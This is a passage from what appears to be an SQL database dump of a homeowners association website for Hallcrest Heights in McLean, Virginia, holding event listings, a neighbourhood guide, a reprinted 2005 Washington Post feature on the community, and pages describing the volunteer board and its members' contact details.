00:00:00','','','{\"show_title\":\"1\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',21,9,'','',1,8625,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(4,42,'Events','events','<p><strong>HALLCREST EVENTS</strong><br />HHHOA Monthly Board Meeting<br />Volunteer Day<br />ACC Walk Through<br />Garden Club Meeting<br />International Cookout<br />HHHOA Annual Meeting<br /><br /><strong>NOVA EVENTS</strong><br />Virginia for Lovers <br />- <a href=\"http://www.virginia.org\" target=\"_blank\">www.virginia.org</a><br />Great Falls Attractions <br />- <a href=\"http://www.fxva.com/our-community/great-falls-mclean/attractions/\" target=\"_blank\">www.fxva.com/our-community/great-falls-mclean/attractions/</a><br />Fairs and Festivals <br />- <a href=\"http://www.fairsandfestivals.net/states/va\" target=\"_blank\">www.fairsandfestivals.net/states/va</a><br /><br /><strong>MCLEAN EVENTS</strong><br />McLean Community Center <br />- <a href=\"hhtp://www.aldentheater.org\" target=\"_blank\">aldentheater.org</a><br />- <a href=\"http://www.mcleancenter.org\" target=\"_blank\">mcleancenter.org</a><br />McLean, VA Patch<br />- <a href=\"http://mclean.patch.com\" target=\"_blank\">mclean.patch.com</a><br />Trip Advisor - Things to do in McLean<br />- <a href=\"http://www.tripadvisor.com\" target=\"_blank\">www.tripadvisor.com</a><br /><br /></p>','',1,2,'2013-06-07 15:38:13',47,'','2013-10-11 13:21:37',47,0,'0000-00-00 00:00:00','2013-06-07 15:38:13','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,8,'','',1,3469,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(5,43,'A Guide to the Neighborhood','neighborhood-guide','<p><em><span style=\"font-size: large;\">Farmers Market</span></em><br /><br /><strong>McLean Farmers’ Market</strong><br />Fridays, May-November, 8 AM – 12 PM<br />1659 Chainbridge Rd. (Lewinsville Park)<br />McLean, VA 22101<br />(703) 642-0128<br /> <br /><strong>Vienna Saturday Farmers’ Market</strong><br />Saturdays, May – October, 8 AM – 12 PM<br />131 Church St., NE (Caboose Parking Lot)<br />Vienna, VA 22180<br /> <br /><strong>Falls Church Farmers’ Market</strong><br />Saturdays, January – March 9 AM – 12 PM, April – December 8AM - 12 PM<br />300 Park Ave (City Hall Parking Lot)<br />Falls Church, VA 22041<br /><br /></p>\r\n<hr />\r\n<p> <em><span style=\"font-size: large;\"><br />Parks</span></em><br /><br /><strong>Lewinsville Park</strong><br />1659 Chain Bridge Road, McLean, VA 22101<br /> <br /><strong>McLean Central Park</strong><br />1468 Dolley Madison Blvd., McLean 22102<br /> <br /><strong>Clemyjontri Park</strong><br />6317 Georgetown Pike, McLean, VA 22101<br /> <br /><strong>Turkey Run Park</strong><br />700 GW Memorial Parkway, McLean, Virginia<br /> <br /><strong>Great Falls Park - Virginia Entrance</strong><br />9200 Old Dominion Drive, Mc Lean, VA - (703) 285-2965<br /><br /></p>\r\n<hr />\r\n<p> <br /><em><span style=\"font-size: large;\">Hospitals</span></em><br /><br />Inova Fairfax Hospital<br />3300 Gallows Rd.<br />Falls Church, VA 22042<br />(703) 776-4001<br /><span style=\"text-decoration: underline;\"><a href=\"http://www.inova.org/patient-and-visitor-information/facilities/inova-fairfax-hospital/index.jsp\" target=\"_blank\">Visit Website</a></span><br /> <br />Virginia Hospital Center<br />1701 N. George Mason Dr.<br />Arlington, VA 22205<br />(703) 558-5000<br /><span style=\"text-decoration: underline;\"><a href=\"http://www.virginiahospitalcenter.com/\" target=\"_blank\">Visit Website</a></span><br /> <br />Dominion Hospital<br />2960 Sleepy Hollow Rd.<br />Falls Church, VA 22044<br />(703) 536-2000<br /><span style=\"text-decoration: underline;\"><a href=\"http://www.dominionhospital.com/\" target=\"_blank\">Visit Website</a></span><br /><br /></p>\r\n<hr />\r\n<p> <br /><em><span style=\"font-size: large;\">Transportation</span></em></p>\r\n<h4>Washington Metropolitan Area Transit Authority</h4>\r\n<ul>\r\n<li><a href=\"http://www.wmata.com\" rel=\"alternate\">Metro and Bus Information</a>\r\n<ul>\r\n<li><a href=\"https://www.wmata.com/schedules/maps/upload/color_map_silverline.pdf\" rel=\"alternate\">Metro Silver Line Map</a></li>\r\n<li>WMATA Bus: <a href=\"https://www.wmata.com/schedules/timetables/upload/3t.pdf\" rel=\"alternate\">3T (Pimmit Hills Line)</a> and <a href=\"https://www.wmata.com/schedules/timetables/upload/23ac.pdf\" rel=\"alternate\">23T (McLean- Crystal City Line)</a></li>\r\n<li><a href=\"http://www.fairfaxcounty.gov/connector/pdf/schedule/721.pdf\" rel=\"alternate\">Fairfax County Connector- Route 721</a> (McLean Metro- Chain Bridge Road)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<h4>Carpool Information</h4>\r\n<ul>\r\n<li><a href=\"http://www.fairfaxcounty.gov/fcdot/sources.htm\" rel=\"alternate\">Fairfax County RideSources</a></li>\r\n</ul>\r\n<h4>Additional Resources</h4>\r\n<ul>\r\n<li>Fairfax County Ride Sources (703) 324-1111</li>\r\n<li>Commuter Connections 1-800-745-RIDE</li>\r\n<li>Loudoun Rideshare (703) 777-0246 or (703) 478-8433</li>\r\n<li>Loudoun County Commuter Bus (703) 771-5665<br /><br /></li>\r\n</ul>\r\n<hr />\r\n<p><br /><em><span style=\"font-size: large;\">Fire and Rescue</span></em><br /><br />McLean Volunteer Fire Department<br />1444 Laughlin Ave.<br />McLean, VA 22101<br /><span style=\"text-decoration: underline;\"><a href=\"http://www.mcleanvfd.org/\" target=\"_blank\">Visit Website</a></span><br />For emergencies dial 911.</p>\r\n<hr />\r\n<p><br /><em><span style=\"font-size: large;\">Houses of Worship</span></em></p>\r\n<table style=\"width: 100%;\" border=\"0\" cellpadding=\"4\" align=\"left\">\r\n<tbody>\r\n<tr>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps?q=Lewinsville+Presbyterian+Church+1724+Chain+Bridge+Rd.,+McLean,+VA&hl=en&ll=38.92982,-77.197194&spn=0.009882,0.01929&sll=38.929849,-77.196959&sspn=0.009882,0.01929&hq=Lewinsville+Presbyterian+Church&hnear=1724+Chain+Bridge+Rd,+McLean,+Fairfax,+Virginia+22101&t=m&z=16&iwloc=A\" target=\"_blank\">Lewinsville Presbyterian Church</a></span><br />1724 Chain Bridge Rd., McLean, VA – (703) 356-7200</td>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=13630486973872196781&q=synagogues+mclean+va&gl=us&hl=en&cd=3&cad=src:pplink&ei=nDuOTMboM6qwywS7ppgI\" target=\"_blank\">Temple Rodef Shalom Synagogue</a></span><br />2100 Westmoreland Street, Falls Church, VA - (703) 532-2217</td>\r\n</tr>\r\n<tr>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=1759044803688883523&q=worship+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\">St John\'s Episcopal Church</a></span><br />6715 Georgetown Pike, McLean, VA - (703) 356-4902</td>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=10737563807815193592&q=worship+mclean+va&gl=us&hl=en&cd=6&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\">St John the Beloved Catholic</a></span><br />6420 Linway Terrace, Mc Lean, VA - (703) 356-7916</td>\r\n</tr>\r\n<tr>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=7371646531160565994&q=worship+mclean+va&gl=us&hl=en&cd=2&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\">Mc Lean Presbyterian Church</a></span><br />1020 Balls Hill Road, McLean, VA - (703) 821-0800</td>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=85250331542849852&q=worship+mclean+va&gl=us&hl=en&cd=7&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\">Holy Transfiguration Church</a></span><br />8501 Lewinsville Rd, McLean, Virginia - (703) 734-9566</td>\r\n</tr>\r\n<tr>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=15367465136288273312&q=worship+mclean+va&gl=us&hl=en&cd=3&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\">Mc Lean Baptist Church</a></span><br />1367 Chain Bridge Road, McLean, VA - (703) 356-8080</td>\r\n<td><a href=\"http://maps.google.com/maps/place?cid=12610779283999867771&q=worship+mclean+va&gl=us&hl=en&cd=8&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\"><span style=\"text-decoration: underline;\">St Luke\'s Catholic Parish</span></a><br />7001 Georgetown Pike, Mc Lean, VA - (703) 356-1255</td>\r\n</tr>\r\n<tr>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=233013739269591554&q=worship+mclean+va&gl=us&hl=en&cd=4&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\">St Luke Orthodox Church</a></span><br />6801 Georgetown Pike, McLean, VA - (703) 893-1759</td>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=10714615803695944558&q=worship+mclean+va&gl=us&hl=en&cd=9&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\">Chesterbrook United Methodist</a></span><br />1711 Kirby Road, Mc Lean, VA - (703) 356-7100</td>\r\n</tr>\r\n<tr>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=13268019156489289482&q=worship+mclean+va&gl=us&hl=en&cd=5&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\">Korean United Methodist Church of Greater Washington</a></span><br />1219 Swinks Mill Road, McLean, VA - (703) 448-1131</td>\r\n<td><a href=\"http://maps.google.com/maps/place?cid=16159567338290573666&q=worship+mclean+va&gl=us&hl=en&cd=10&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ\" target=\"_blank\"><span style=\"text-decoration: underline;\">Church of Jesus Christ of LDS</span></a><br />1325 Scotts Run Road, Mc Lean, VA - (703) 734-1942</td>\r\n</tr>\r\n<tr>\r\n<td><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=14572696815429026639&q=mclean+bible+church&gl=us&hl=en&cd=1&cad=src:pplink&ei=imGOTNlulvzIBdWK8T8\" target=\"_blank\">McLean Bible Church</a></span><br />8925 Leesburg Pike, Vienna, VA - (703) 790-5590</td>\r\n<td> </td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></p>\r\n<p> </p>\r\n<hr />\r\n<p> <br /><em><span style=\"font-size: large;\">Golf Courses</span></em><br /><br /><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=10679457874143768481&q=golf+course+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=lTyOTJvVKaDeygT1pqTdDw\" target=\"_blank\">Washington Golf & Country Club</a></span><br />3017 N Glebe Rd, Arlington, Virginia- (703) 528-1409<br /> <br /><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=7422004494754812582&q=golf+course+mclean+va&gl=us&hl=en&cd=4&cad=src:pplink&ei=lTyOTJvVKaDeygT1pqTdDw\" target=\"_blank\">Jefferson District Park & Golf</a></span><br />7900 Lee Highway, Falls Church, VA - (703) 573-0443<br /> <br /><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=10199218883031317261&q=Westwood+Country+Club,+Vienna,+VA&gl=us&hl=en&cd=1&cad=src:pplink&ei=Zj2OTOaKD5fUzATu7_BR\" target=\"_blank\">Westwood Country Club Pro Shop</a></span><br />800 Maple Avenue East, Vienna, VA - (703) 938-2300<br /><br /></p>\r\n<hr />\r\n<p><br /><em style=\"font-size: large;\"><span style=\"font-size: large;\">Library</span></em><br /><br /><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=5727665263910949534&q=library+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=kz2OTK7CK5fUzATu7_BR\" target=\"_blank\">Dolley Madison Library</a></span><br />1244 Oak Ridge Avenue, Mc Lean, VA - (703) 356-0770<br /> <br /><span style=\"text-decoration: underline;\"><a href=\"http://maps.google.com/maps/place?cid=5727665263910949534&q=library+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=kz2OTK7CK5fUzATu7_BR\" target=\"_blank\">Tysons Pimmit Regional Branch</a></span><br />7584 Leesburg Pike, Falls Church, VA - (703) 790-8088<br /><br /></p>\r\n<p>Little Free Library- Hallcrest Heights, Eldorado Oval</p>\r\n<p> </p>','',1,2,'2013-06-07 15:52:19',47,'','2017-01-18 15:15:43',57,0,'0000-00-00 00:00:00','2013-06-07 15:52:19','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',28,7,'','',1,4623,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(6,46,'Community Spirit Is Hallcrest\'s Hallmark','community-spirit-is-hallcrest-s-hallmark','<p><span id=\"yCyPo1\"><a class=\"twp-brand-large\" href=\"http://www.washingtonpost.com/\" target=\"_blank\">The Washington Post <br /></a></span><br /><img src=\"images/press/Community_Spirit_Is_Hallcrests_Hallmark.jpg\" alt=\"\" /></p>\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td align=\"left\" valign=\"top\">At right, Heidi Deger and her friend Meghan Blaul, both 6, enjoy an early spring day outside at Hallcrest Heights in McLean.</td>\r\n</tr>\r\n<tr>\r\n<td align=\"left\" valign=\"bottom\"> </td>\r\n</tr>\r\n<tr>\r\n<td align=\"left\" valign=\"bottom\"><strong>Photo Credit: </strong>Photos Ann Cameron Siegal For The Washington Post</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>In the mid-1990s, Hallcrest Heights in McLean appeared to be heading downhill.</p>\r\n<p>Annual meetings at the 158-unit townhouse community were sparsely attended, leaning more toward gripe sessions than productive events. The houses and grounds were looking dreary. Semi-annual walk-throughs by the architectural board were christened \"the parade of the picky people.\" The newcomers\' welcome kit was an impersonal list of community rules.</p>\r\n<p>And relationships between the board of directors and residents weren\'t so hot. \"The old board spent $11,000 on lawyer\'s fees,\" said Clark Tyler, association president. \"As soon as members had a problem, they\'d call a lawyer.\"</p>\r\n<p>Today, Hallcrest Heights has blossomed into a lively, attractive community where annual meetings draw more than 100 enthusiastic residents, architectural board walk-throughs are known for the kudos received, and newcomers receive a personal welcome along with a well-designed, informative packet of information.</p>\r\n<p>The homeowners association could serve as a model, and residents credit Tyler, who assumed office in 1999, with much of the turnaround. His secret: Focus on the big picture and let the petty things go.</p>\r\n','\r\n<p> </p>\r\n<table id=\"contentColumn1\" style=\"width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td align=\"left\" width=\"250\"><br clear=\"all\" />\r\n<table style=\"width: 228px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"1\" bgcolor=\"#ffffff\">\r\n<tbody>\r\n<tr>\r\n<td align=\"center\" bgcolor=\"#cccccc\" width=\"228\">\r\n<table style=\"width: 226px; background-color: #ffffff;\" border=\"0\" cellspacing=\"5\" cellpadding=\"1\">\r\n<tbody>\r\n<tr>\r\n<td align=\"left\" width=\"1\"> </td>\r\n<td align=\"left\" width=\"226\"><strong>HALLCREST HEIGHTS</strong><br />\r\n<p><strong>BOUNDARIES:</strong> Dolley Madison Boulevard to the north, Old Chain Bridge Road to the south, Dulles Access Road to the west and Great Falls Street to the east.</p>\r\n<p><strong>SCHOOLS:</strong> Kent Gardens Elementary, Longfellow Middle and McLean High schools.</p>\r\n<p><strong>HOME SALES:</strong> Four houses have sold in the past 12 months at prices from $475,000 to $569,000, said Evan Lacopo of Laughlin Miller Realtors. Four houses are under contract; there are no houses actively on the market.</p>\r\n<p><strong>WITHIN WALKING DISTANCE:</strong> McLean High School, Lewinsville Park athletic fields and community center, McLean government center.</p>\r\n<p><strong>WITHIN 15 MINUTES BY CAR:</strong> George Washington Parkway, Capital Beltway, Interstate 66, Tysons Corner, Vienna, Falls Church.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td>\r\n<p>\"We don\'t get into neighbor-to-neighbor problems,\" said Tyler, who added that he is always amazed at how much contention he finds in other homeowners associations. \"If you get folks focused on something else, little problems will go away.\"</p>\r\n<p>The \"something else,\" or \"biggies,\" as Tyler calls them, included beefing up a worn-out landscape, sharing ideas on ways to enhance 35-year-old townhouses, and building relationships with local businesses and community leaders.</p>\r\n<p>Community spirit has soared, and Hallcrest Heights\' all-volunteer board is praised for its sound fiscal policies and good public relations skills. \"This community has exceeded all my expectations,\" said Lisa Pittman, a Capitol Hill staffer who moved in six years ago.</p>\r\n<p>Quarterly dues of $270 cover front-yard mowing and mulching, maintenance for seven acres of common ground, trash collection, community lighting, road maintenance and capital improvements. Efficient long-range planning keeps the community within budget. \"There are no special assessments,\" said Tyler, who often taps the expertise and advice of residents as well as local professionals.</p>\r\n<p>Local designers were called on for remodeling workshops. A local arborist analyzed the trees and shrubbery on the property and gave advice on making the most of the tiny private spaces at the rear of the houses. Group discounts for services were sought and procured by the board.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>In the past five years, more than 60 percent of residents have done major landscaping around their homes, Tyler said. Many have turned what were once concrete patios into cozy personal spaces with fountains, sculptures and benches. \"You can do many things with a small yard,\" said Rosette White, whose husband, Bill, created a garden that is a visual extension of the house.</p>\r\n<p>The Whites, who each owned a home in Hallcrest Heights before marrying nine years ago, started annual home tours in the community to allow residents to show off their upgrades. Rosette, a decorator in her native Belgium, and now a retired real estate agent, said: \"I wanted to show people what could be done.\"</p>\r\n<p>The addition of crown molding, built-in shelving, recessed lighting and French doors, all in keeping with the character of the house, are among the improvements that have turned the Whites\' 2,400 square feet of living space into a showplace.</p>\r\n<p>During the home tours, which feature 10 houses each year, residents provide one-page handouts with details such as who did the remodeling, the quality of the work, efficiency of the workers and what special materials were used. \"They give real advice on real projects,\" Tyler said.</p>\r\n<p>Dick and Kathy Meade have spent five years renovating their home and have four pages of contractors to recommend. \"The good guys get passed around,\" Dick Meade said. \"The bad guys don\'t get invited back.\"</p>\r\n<p>The varied rooflines and staggered setbacks at Hallcrest Heights keep the community from looking too uniform. Pitched, mansard and flat roofs top houses that are clustered in short rows, allowing for 50 end units. Underground utilities prevent the cluttered look of overhead wires.</p>\r\n<p>Enhancing the physical property was only the start. Hallcrest\'s board also ventured out beyond the community -- not rallying to oppose change, but doing its homework and seeking responsible solutions to problems.</p>\r\n<p>For example, Metro seems to be heading to Tysons Corner someday, along the Dulles expressway directly behind the community. The current wooden fence does little to mask the drone of constant traffic. (Although Dick Meade said his grandchildren dug into their imagination to describe the hum as \"our ocean sound,\" referring to sirens as the occasional \"fire boat\" passing.)</p>\r\n<p>The community hired an acoustic engineer to draw up plans for replacing the privacy screen with a more effective sound barrier, then presented the proposal to state Del. James M. Scott (D-Fairfax). The result is that the Virginia Department of Transportation has been directed to come up with an estimate for the barrier by Oct. 1, putting the community closer to greatly reducing traffic noise.</p>\r\n<p>Having a reputation as savvy citizens rather than flame-throwers is a source of pride for residents. \"The more visible we can be with the name \'Hallcrest Heights,\' the harder it is for anyone to ignore us or tell us to get lost,\" said Tyler.</p>\r\n<p>Among the keys to getting phone calls returned appears to be the association\'s generosity with thank you notices in the community\'s newsletter. Whether the notices praise a public official who has gone the extra mile or the handyman who is reliable, the word spreads quickly.</p>\r\n<p>The homeowners association doesn\'t ignore absentee owners, either. Rentals, once as high as 35 percent, have dropped to 23 percent. \"We talk to nonresident owners frequently, keeping them up to date on the community and sales prices,\" said Tyler. A community advisory board, charged with pinpointing concerns and opportunities, is open to homeowners and tenants.</p>\r\n<p>Building a community reputation involves give and take. When Fairfax County sought a community for a model project to reduce the yard debris that overwhelms county incinerators, a 15-year-old Hallcrest resident volunteered to spearhead the task.</p>\r\n<p>Hallcrest already has a community brush pile where tree limbs and brush are ground up for mulch, but Douglas Landrum, a McLean High School student who loves science and the outdoors, has bigger plans for the county\'s pilot program.</p>\r\n<p>Working toward his Eagle Scout award, Landrum wants to test various types of compost bins and educate residents on why composting is important. He has surveyed his neighbors to find out who has experience with composting and who is willing to help with the project. \"I\'ve had amazing support from the county and the community,\" he said.</p>\r\n<p>The compost created by the project will be used within Hallcrest to improve its soil.</p>\r\n<p>\"Here\'s a prime example of residents getting involved and our county contacts rising to the occasion, all for a public purpose, \" Tyler said. \"All it takes is a catalyst and people who are willing to be pulled together.\"<br /><br /><br /></p>\r\n<div id=\"article\">\r\n<div id=\"byline\">By Ann Cameron Siegal</div>\r\nSpecial to The Washington Post<br /> Saturday, April 16, 2005; Page G01</div>\r\n<div id=\"articleCopyright\" style=\"font-size: x-small;\" align=\"left\"><br />© 2005 The Washington Post Company</div>',1,7,'2013-06-07 16:09:29',47,'','2013-06-09 09:49:13',47,0,'0000-00-00 00:00:00','2013-06-07 16:09:29','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"1\",\"info_block_position\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"_:default\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',26,1,'','',1,1833,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(7,47,'Press Article 2','press-article-2','<p>Press Article 2 content...</p>','',-2,7,'2013-06-07 16:21:20',47,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-06-07 16:21:20','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,4,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(8,48,'About Us','about-us','<p>The Hallcrest Heights Association Board is a volunteer entity comprised of resident owners who are elected to represent the diverse interests of the Hallcrest community. It is a 7 member team of dedicated individuals who positively impact the quality of life for all of the Hallcrest residents through their contribution of time and talent, and is active in working with local government officials to support the Hallcrest neighborhood.<br /> <br />The Board also fosters opportunities that encourage the members of Hallcrest to be active participants in the formulation of events and decisions that effect the community. Residents are welcomed at the monthly and annual Board meetings, invited to serve on a variety of Association committees and to seek an elected position on the Board, if desired.<br /><br />The Association prides itself on its transparency with frequent communiques encouraging suggestions and ideas that will benefit the neighborhood and requesting feedback on existing standards.</p>','',1,2,'2013-06-07 17:56:23',47,'','2014-01-20 15:08:21',50,0,'0000-00-00 00:00:00','2013-06-07 17:56:23','0000-00-00 00:00:00','','','{\"show_title\":\"1\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,6,'','',1,3376,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(9,49,'About the Board of Directors ','board-members','<p><a title=\"\" href=\"images/clark_in_suit_big.jpg\" rel=\"prettyPhoto\"><img style=\"float: left;\" title=\"Clark in suit\" src=\"images/clark_in_suit.jpg\" alt=\"Clark in suit\" /></a>Hallcrest Heights is self-governed by a volunteer Board of Directors which convenes monthly at open meetings. There is an annual Association meeting in November.<br /><br />The Board is always interested in those who might be willing to serve either on the Board or in a helper capacity for special events, or even such matters as watering of trees, clean-up, distribution of information, planting or advising on a range of ideas for improvements, policies, special committees, newsletter articles, Board Meeting agenda items, etc. Contact any of the above Board members if you are interested.<br /><br /></p>\r\n<h3><br /><br />Board Members</h3>\r\n<h5>Find all board members here.</h5>\r\n<p><strong>President</strong> - <strong>M.L Clark Tyler</strong><br />703-893-3336; clark.tyler75@gmail.com<br />Chairs Board meetings, sets goals for the Board, signs checks, acts for Board with agencies, and local officials.<br /><br /><strong>Vice President - Claudio Ternieden</strong> (Alternate: Marie Ternieden)<br /> 703-501-7871; cternieden@yahoo.com<br />Acts for President when absent, dual signs checks over $5,000.<br /><br /><strong>Treasurer - Richard Matsko</strong><br /> 703-734-9746; matsko1@verizon.net <br />Responsible for financial records, and status reports, approves payables, coordinates with Accounts Manager and tax CPA, chairs Audit Committee.<br /><br /><strong>Secretary - John Aranha</strong><br />info@hallcrestheights.org<br />Keeps historical records, contracts and minutes of Board meetings; handles mail and administrative matters for the Board.</p>\r\n<p><strong>Board Member - Ben East</strong><br /> 703-448-1176; chambepeak@gmail.com</p>\r\n<p><strong>Board Member - Rahul Saddy</strong><br /> saddyr@yahoo.com</p>\r\n<p><strong>Board Member - Susana Kyrgos </strong>(Alternate: Illias Spyrou)<br />info@hallcrestheights.org</p>\r\n<p><strong>Other Board Activities</strong></p>\r\n<p><strong>Maintenance</strong><br />Negotiates and monitors contracts for trash removal and capital improvements (walls, sidewalks, streets, etc.). In charge of planning, and advises on, general community improvements.<br /><br /><strong>Architectural Control</strong><br />Coordinates community walk-through property inspections, ensures that properties are maintained according to the association\'s covenants and guidelines; chairs committee that reviews all requests for changes to property exterior for approval.<br /><br /><strong>Resident Relations</strong><br />Monitors sales and distributes disclosure packet to buyers/sellers; serves as point of contact for realtors. Organizes & maintains contact information for emergency notification and community announcements. Conducts resident surveys.<br /><br /><strong>Planning Special Projects</strong> <br />Plans and oversees Hallcrest Heights\' activities such as the annual picnic, Santa\'s visit, Dumpster 